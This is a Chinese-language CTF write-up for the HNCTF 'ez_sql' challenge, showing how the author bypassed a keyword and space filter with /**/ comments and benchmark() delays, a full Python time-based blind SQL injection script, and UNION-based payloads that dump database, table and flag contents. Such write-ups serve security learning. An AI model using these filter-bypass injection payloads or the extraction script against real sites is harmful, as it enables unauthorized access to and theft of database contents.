At Dawn
March 2, 2023

[HNCTF]ez_sql

非预期解

image-20221005233241890

页面是一个查询界面,输入1:

image-20221005233329408

我感到有点悬念,经过测试发现ban了and,sleep,extractvalue,updatexml,空格,information,#,-

测试发现可以使用benchmark(500000,md5('test')进行延时,尝试输入payload:id=1'/**/or/**/if(2>1,(select/**/benchmark(500000,md5('test'))),1)='1发现可以延时,之后就写了一个盲注脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#AUthor:@Boogipop
import requests
import time
payload="1'/**/or/**/if(2>1,(select/**/benchmark(1500000,md5('test'))),1)='1"
url='http://43.143.7.97:28004/index.php'
result=''
i=0
while True:
    head=1
    tail=127
    i+=1
    while head<tail:
        mid=(head+tail)//2
        data={
            "id":f"0'/**/or/**/if(ascii(substr((select/**/group_concat(a)/**/from/**/(select/**/(1)a/**/union/**/select/**/*/**/from/**/ctftraining.flag)d),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"
            # "id":f"1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='ctftraining'),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"
            # "id":f"1'/**/or/**/if(ascii(substr((select/**/group_concat(database_name)/**/from/**/mysql.innodb_table_stats),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"

        }

        t1=time.time()
        r=requests.post(url,data=data)
        t2=time.time()
        print(t2-t1)
        if t2-t1>0.3:
            head=mid+1
        else:
            tail=mid
    if head!=1:
        result+=chr(head)
        print(result)
    else:
        break

慢慢跑就出来了

预期解

听大大说这一题其实不用盲注就可以了,还是我太笨了哈哈哈,好像说是有回显的,我回去测试了一下,发现确实如此:

id=1'/**/union/**/select/**/1,2,3/**/where/**/1='1输入这个后可以发现:

image-20221005233914867

有他妈的回显,鉴定成功我是个傻逼

id=1'/**/union/**/select/**/1,2,(select/**/group_concat(database_name)/**/from/**/mysql.innodb_table_stats)/**/where/**/1='1

爆出数据库,由于我踩过坑所以知道flag在其他数据库:

image-20221005234027652

继续爆表、

id=1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='ctftraining

最后爆字段即可:

1
id=1'/**/union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)a/**/where/**/1='1

image-20221005234626365

结束~

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#CTF#SQL